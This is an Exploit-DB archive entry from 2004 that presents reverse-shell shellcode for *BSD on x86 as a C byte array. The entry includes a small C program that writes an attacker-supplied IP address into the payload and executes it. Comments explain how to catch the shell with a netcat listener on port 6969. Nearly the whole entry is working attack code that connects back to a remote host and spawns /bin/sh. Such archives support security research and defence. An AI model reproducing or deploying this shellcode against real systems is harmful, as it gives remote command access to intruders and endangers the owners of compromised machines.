bsd/x86 - reverse portbind 129 bytes

2004-09-26T00:00:00
ID EDB-ID:13256
Type exploitdb
Reporter Sinan Eren
Modified 2004-09-26T00:00:00

Description

bsd/x86 reverse portbind 129 bytes. Shellcode exploit for bsd_x86 platform

                                        
                                            /* reverse-portshell *BSD shellcode by noir       */
/* local usage: ./reverse-shell 192.168.2.33      */
/* remote:  nc -n -v -v -l -p 6969                */ 
/* listen on 6969/tcp				  */
/* noir@gsu.linux.org.tr			  */

char shellcode[] = 
{
  0x31,0xc9,0x51,0x41,   
  0x51,0x41,0x51,0x51,
  0x31,0xc0,0xb0,0x61,
  0xcd,0x80,0x89,0x07,
  0x31,0xc9,0x88,0x4f, 
  0x04,0xc6,0x47,0x05,
  0x02,0xc7,0x47,0x08,
  0xc0,0xa8,0x01,0x45, //ipaddr
  0x66,0xc7,0x47,0x06,   
  0x1b,0x39,0x6a,0x10,
  0x8d,0x47,0x04,0x50,  
  0x8b,0x07,0x50,0x50,
  0x31,0xc0,0xb0,0x62,   
  0xcd,0x80,0x31,0xc9,
  0x51,0x8b,0x07,0x50,   
  0x50,0x31,0xc0,0xb0,
  0x5a,0xcd,0x80,0x41,   
  0x83,0xf9,0x03,0x75,
  0xef,0x31,0xc9,0x51,   
  0x51,0x31,0xc0,0xb0,
  0x17,0xcd,0x80,0xeb,   
  0x23,0x5b,0x89,0x1f,
  0x31,0xc9,0x88,0x4b,   
  0x07,0x89,0x4f,0x04,
  0x51,0x8d,0x07,0x50,   
  0x8b,0x07,0x50,0x50,
  0x31,0xc0,0xb0,0x3b,   
  0xcd,0x80,0x31,0xc9,
  0x51,0x51,0x31,0xc0,   
  0xb0,0x01,0xcd,0x80,
  0xe8,0xd8,0xff,0xff,   
  0xff,0x2f,0x62,0x69,
  0x6e,0x2f,0x73,0x68,   
  0x41
};

int
main(int argc, char ** argv)
{
  void (*f) (void);
  unsigned int d;

  if(!argv[0])
    exit(0);

  d = inet_addr(argv[1]);
  printf("IP: %lx shellcode len: %d\n", d, strlen(shellcode));

  shellcode[28] = d & 0xff ;
  shellcode[29] = (d >> 8) & 0xff;
  shellcode[30] = (d >> 16) & 0xff;
  shellcode[31] = (d >> 24) & 0xff;

  f =  (void *) shellcode;
  f();
}

// milw0rm.com [2004-09-26]